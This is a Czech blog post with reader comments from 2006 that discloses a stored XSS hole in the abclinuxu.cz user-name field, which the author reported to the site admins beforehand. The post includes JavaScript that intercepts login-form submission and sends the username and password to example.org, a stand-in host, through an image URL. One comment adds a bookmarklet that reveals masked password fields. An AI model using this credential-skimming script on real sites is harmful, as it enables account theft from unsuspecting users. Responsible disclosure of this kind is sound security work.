abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 17:33 | Nová verze

    Canonical vydal (email, blog, YouTube) Ubuntu 24.04 LTS Noble Numbat. Přehled novinek v poznámkách k vydání a také příspěvcích na blogu: novinky v desktopu a novinky v bezpečnosti. Vydány byly také oficiální deriváty Edubuntu, Kubuntu, Lubuntu, Ubuntu Budgie, Ubuntu Cinnamon, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio, Ubuntu Unity a Xubuntu. Jedná se o 10. LTS verzi.

    Ladislav Hagara | Komentářů: 5
    včera 14:22 | Komunita

    Na YouTube je k dispozici videozáznam z včerejšího Czech Open Source Policy Forum 2024.

    Ladislav Hagara | Komentářů: 1
    včera 13:22 | Nová verze

    Fossil (Wikipedie) byl vydán ve verzi 2.24. Jedná se o distribuovaný systém správy verzí propojený se správou chyb, wiki stránek a blogů s integrovaným webovým rozhraním. Vše běží z jednoho jediného spustitelného souboru a uloženo je v SQLite databázi.

    Ladislav Hagara | Komentářů: 0
    včera 12:44 | Nová verze

    Byla vydána nová stabilní verze 6.7 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 124. Přehled novinek i s náhledy v příspěvku na blogu. Vypíchnout lze Spořič paměti (Memory Saver) automaticky hibernující karty, které nebyly nějakou dobu používány nebo vylepšené Odběry (Feed Reader).

    Ladislav Hagara | Komentářů: 0
    včera 04:55 | Nová verze

    OpenJS Foundation, oficiální projekt konsorcia Linux Foundation, oznámila vydání verze 22 otevřeného multiplatformního prostředí pro vývoj a běh síťových aplikací napsaných v JavaScriptu Node.js (Wikipedie). V říjnu se verze 22 stane novou aktivní LTS verzí. Podpora je plánována do dubna 2027.

    Ladislav Hagara | Komentářů: 0
    včera 04:22 | Nová verze

    Byla vydána verze 8.2 open source virtualizační platformy Proxmox VE (Proxmox Virtual Environment, Wikipedie) založené na Debianu. Přehled novinek v poznámkách k vydání a v informačním videu. Zdůrazněn je průvodce migrací hostů z VMware ESXi do Proxmoxu.

    Ladislav Hagara | Komentářů: 0
    včera 04:11 | Nová verze

    R (Wikipedie), programovací jazyk a prostředí určené pro statistickou analýzu dat a jejich grafické zobrazení, bylo vydáno ve verzi 4.4.0. Její kódové jméno je Puppy Cup.

    Ladislav Hagara | Komentářů: 0
    24.4. 22:44 | IT novinky

    IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.

    Ladislav Hagara | Komentářů: 12
    24.4. 15:55 | Nová verze

    Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    24.4. 13:44 | IT novinky

    Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.

    Ladislav Hagara | Komentářů: 0
    KDE Plasma 6
     (73%)
     (9%)
     (2%)
     (16%)
    Celkem 765 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník

    Jak ukrást hesla uživatelům abclinuxu?

    2.5.2006 21:59 | Přečteno: 2430× | Různé | poslední úprava: 3.5.2006 08:54

    Když tak řeším bezpečností chyby v phpMyAdminovi, napadlo mě jak jsou proti podobným věcem zabezpečené portály. Protože dost často používám abclinuxu, tak přišlo první na mušku :-).

    Předem podotýkám, že tento článek byl nejdříve dán k dispozici adminům, takže doufám, že v době zveřejnění už není možné toto provést.

    Většina prohlížečů dnes umí javascript, který se dá dělat spousta zajímavých věcí. Třeba přidat javascript na obsluhu nějaké událost nebo posílat XML HTTP requesty. Bystřejším již možná dochází, že pokud si můžu vložit vlastní javascript, není žádný problém odchytit odesílání přihlašovacího formuláře. Kdo nevěří, může si zkusit následující ukázku (ta heslo jenom zobrazí, ale to už je jenom detail):

    <script type="text/javascript">
    <!--
    function process() {
        p = document.getElementById('pwd').value;
        u = document.getElementById('usr').value;
        document.getElementById('ls_prepinac').innerHTML = 
            '<img src="http://example.org/?u=' + 
            u + '&p=' + p + '"/>';
        window.alert('odeslano na example.org:\npass: ' + 
            p + '\n' + 'user: ' + u);
    }
    function load() {
        frm = document.forms[0];
        frm.onsubmit = process;
    }
    window.onload = load;
    //-->
    </script>
    
    <div id="ls_prepinac">xx</div>
    <form method="post">
    <input type="text" name="u" id="usr">
    <input type="password" name="p" id="pwd">
    <input type="submit">
    </form>
    

    Teď už jenom zbývá jak dostat vlastní javascript na logovací stránku. Protože je samostatná, tak jediná věc, která je tam vidět z uživatelem ovlivnitelného obsahu jsou zprávičky. Obsah zpráviček je (aspoň v to doufám) kontrolován na dovolené html, ale ještě nám zbývá jeden zajímavý prvek. Tím je naše jméno, tam si můžeme napsat cokoliv co chceme, včetně javascriptu. Tak teď už jen zbývá doufat, že to moc lidí nezrealizovalo :-). Napsat zprávičku, která bude schválena až takový problém není a pak už je dílo dokonáno.

    Jaké je řešení? Nedovolovat nikde javascript, dá se použít k mnoha nebezpečným věcem.

    Stav chyby:

           

    Hodnocení: 99 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    wake avatar 2.5.2006 22:20 wake | skóre: 30 | blog: wake | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    pane, vy jste hacker !
    Tento příspěvek má hlavičku i patičku!
    hajma avatar 2.5.2006 22:34 hajma | skóre: 27 | blog: hajma | Říčany
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ač momentálně na jiném PC, přemohl jsem lenost a přihlásil jsem se, abych ti mohl dát 3 body.
    21 promarněných znaků
    David Watzke avatar 3.5.2006 05:26 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Jak by řekl Kryton: "Já musím jít prát spodky!"
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    3.5.2006 07:56 rastos | skóre: 62 | blog: rastos
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ja teda neviem o javascripte skoro nič. Ale mohol by autor detailnejšie vysvetliť, ako to funguje (resp. malo fungovať)?

    Pretože mne to pripadá tak, že pri zobrazení správičky sa vyrobia dva fieldy na stránke vyzývajúce na zadanie mena a hesla a button na odoslanie. A pri odoslaní sa obsah tých polí zobrazí v message-boxe. Nie je mi jasné, prečo by som do tých polí ja vypisoval svoj password a ako by sa k tomu passwordu dostal niekto iný, ako ten kto ho tam vypísal?
    .. avatar 3.5.2006 08:53 .. | skóre: 4 | blog:
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Podstatny je ten javascript. HTML kod formulare je jenom pro ukazku, at si to muze kazdy odzkouset sam, doma/v prace/whatever
    3.5.2006 08:56 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Asi nebylo korektí v té ukázce dát dohromady HTML formuláře a ten javascript, tak teď to je pěkně zvlášť :-).
    3.5.2006 08:57 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    xvasek avatar 3.5.2006 10:10 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Teď už to chápeme i my pomalejší, díky. :-)

    Hmm, tak jsem chtěl přihodit veselou historku z natáčení a ukázat fintu, jak jsme to dělali za starých časů my a našel jsem jinou (ne až tak velkou) zranitelnost ábíčka. :-) Kam to oznámit? (Resp. teda jaký má Leoš jabber nebo mail? Nebo do bugzilly?)
    3.5.2006 10:53 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Mail mu můžeš poslat třeba z profilu. Ten bude mít radost :-).
    xvasek avatar 3.5.2006 11:49 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Tímto se omlouvám za svou slepost, v jeho profilu jsem byl a talačítko "Pošlete mi email" jsem nějak nezvládnul lokalizovat a použít. Ale všechno dobře dopadlo, Leoš talčítko v mém profilu zřejmě použít dokázal. :-) Zatím mi poslal smajlíka, takže radost zřejmě má. :-)
    3.5.2006 12:45 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Dle popisu ten problem neohrozuje uzivatele, jen muze zpusobit necitelnost diskusi. Mel bych se konecne dokopat k te automaticke konverzi spicatych zavorek na HTML entity a bude pokoj ;-) Jenze to bych musel prestat pouzivat jednu knihovnu na parsovani HTML, takze moc prace.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    3.5.2006 08:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ten formulář zůstane původní pro přihlášení, jediné co je navíc je ten javascript. Někdo jiný se k tomu dostane tak, že třeba vložíme obrázek. Přepsal jsem ukázku, takže by to mohlo být jasnější (ve skutečnosti by byl javascript asi v samostatném souboru a vložil by se jen odkaz na něj.
    3.5.2006 09:56 digri | skóre: 12 | blog: digri
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    3.5.2006 11:05 Jiří (BoodOk) Kadeřávek | skóre: 19 | blog: BoodOk | Brno
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Zajimalo by mne jak ta hesla dostanete k sobe?
    Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.
    3.5.2006 11:10 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Z toho požadavku na webserver example.org, který nahradím nějakým vlastním. Bohatě na to stačí nějaký free hosting.
    3.5.2006 11:48 Jiří (BoodOk) Kadeřávek | skóre: 19 | blog: BoodOk | Brno
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Mea culpa, nedbale jsem ten kod cetl. Zmatla mne zminka o XMLHttpRequestu, ten ma ochranu pred cross-site komunikaci. Jinak super postreh.
    Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.
    3.5.2006 11:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ano ten ochranu má, už ani nevím proč jsem ho zmiňoval :-).
    3.5.2006 11:55 rastos | skóre: 62 | blog: rastos
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ešte to má stále chybičku, že to heslo tam musí byť vyplnené v čase keď sa tá stránka práve nahrá. Takže by to chcelo zavesiť na nejaký iný event.

    Ale keď už sme pri tom ... mám bookmark na lište, čo má miesto URL toto:

    javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no passwords in forms on this page.%22);})();

    Ake je na stránke heslo a ja vidím len hviezdičky, tak ho ukáže v message-boxe. Funguje to v 95% prípadov ;-)
    3.5.2006 12:19 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Nemusí, to se provádí až při odesílání formuláře. Při natažení dokumentu se jenom nastaví event handler na to odesílání.
    3.5.2006 12:51 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Dekuji Michalovi za tip pro vylepseni abicka. Ochrana tam byla, ale jen u jmen neregistrovanych uzivatelu v diskusi, u profilu chybela.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    brozkeff avatar 3.5.2006 21:45 brozkeff | skóre: 13 | blog: Zpátky po 10 letech | Žďár nad Sázavou
    Rozbalit Rozbalit vše hehe
    Aneb Byl tu názor, že něco takového by reglí uživatelé nikdy neudělali ;e) ?
    3.5.2006 13:26 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Nie prepac, toto by normalne nemalo fungovat. Niesom admin tohto servra a ani neviem nic o zabezpekach tohto servera ale skoro kazdy web si riesi kontrolu tohto problemu, ktory si tu nastitil. Inak toto je super priklad coho by sa mali ludia vyvarovat pri tvoreni webu. Da sa to riesit funkciuo strip_tags() + pomocne scripty viac na http://sk2.php.net/manual/en/function.strip-tags.php (zamerne nedavam, odkaz pretoze neviem ci je dovolene odkazovat z tohto webu na ine weby, admini to nemaju radi:) Tato funkcia sa da samozrejme obist ale to uz je pomaly priestor na novy blog :)
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 13:32 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Skoro vždycky se najde pole, kde ta kontrola je zapomenutá, tady to byl jméno uživatele.
    3.5.2006 13:38 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ano samozrejme, ja nekritizujem adminov, cielom blogov a podobnych diskusii je najst riesenie, co v poslednej dobe vela ludi prestava respektovat.
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 14:20 happy barney | skóre: 34 | blog: dont_worry_be_happy
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    a samozrejme, skoro vzdy sa najde web, ktory nie je pisany v php :-)))
    3.5.2006 14:39 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    a samozrejme vsetko sa da prehnat vsetkym ak sa chce :-)
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 19:58 Mazarik
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    A koli takymto vtipalkom pouzivam firefoxie rozsirenie NoScript:)
    3.5.2006 20:07 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Já taky :-). Ale pokud máš javascript povolený pro abclinuxu.cz a někomu se to podaří vložit přímo do stránky, tak to ničemu nezabrání.

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.